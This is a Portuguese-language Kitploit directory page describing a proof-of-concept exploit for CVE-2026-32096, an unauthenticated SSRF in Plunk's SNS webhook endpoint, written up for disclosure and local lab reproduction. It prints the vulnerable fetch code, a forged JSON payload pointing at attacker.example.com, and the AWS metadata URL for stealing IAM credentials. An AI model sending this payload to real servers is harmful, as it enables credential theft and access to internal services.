Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-32096 — Prova de conceito de exploit para uma vulnerabilidade de SSRF no webhook SNS do Plunk, demonstrando falsificação de requisição do lado do servidor não autenticada via SubscribeURL não validado. | Kitploit
Ferramentas/GitHubGitHub/andrebhu/cve-2026-32096
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Prova de conceito de exploit para uma vulnerabilidade de SSRF no webhook SNS do Plunk, demonstrando falsificação de requisição do lado do servidor não autenticada via SubscribeURL não validado.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-32096

SSRF via confirmação de assinatura SNS da AWS não validada em useplunk/plunk

Resumo

O endpoint da API do Plunk POST /webhooks/sns busca um SubscribeURL fornecido pelo atacante sem verificar a assinatura criptográfica do SNS da AWS. Um atacante não autenticado pode forçar o servidor a fazer requisições HTTP de saída arbitrárias (SSRF).

SeveridadeCrítica — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: Server-Side Request Forgery
Arquivo afetadoapps/api/src/controllers/Webhooks.ts
Autenticação necessáriaNenhuma

Código Vulnerável

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — sem validação de assinatura
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

O payload mínimo tem apenas dois campos:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

Impacto

  • AWS EC2/ECS: Roubar credenciais IAM via http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Serviços internos: Acessar bancos de dados, Redis, API do Kubernetes ou outros serviços não expostos à internet
  • Varredura de portas: Enumerar portas internas via respostas baseadas em tempo e erros

Reprodução

Pré-requisitos

  • Docker & Docker Compose
  • Python 3

Passos

  1. Inicie o ambiente de teste do Plunk:

    root@kitploit:~
    docker compose up -d
    
  2. Inicie o listener de callback SSRF:

    root@kitploit:~
    python3 listener.py
    
  3. Execute o exploit:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. Observe o callback recebido na saída do listener.py, confirmando que o servidor buscou a URL controlada pelo atacante.

Arquivos

ArquivoDescrição
exploit.shScript de exploit de ponta a ponta — envia payload SNS forjado para o endpoint vulnerável
listener.pyListener de callback SSRF — captura e registra requisições recebidas do servidor Plunk
docker-compose.ymlAmbiente Docker Compose mínimo (Postgres, Redis, Plunk) para reprodução local

Referências

  • AWS SNS: Verificando as assinaturas de mensagens do Amazon SNS
  • Folha de dicas de prevenção de SSRF da OWASP
Baixar ferramenta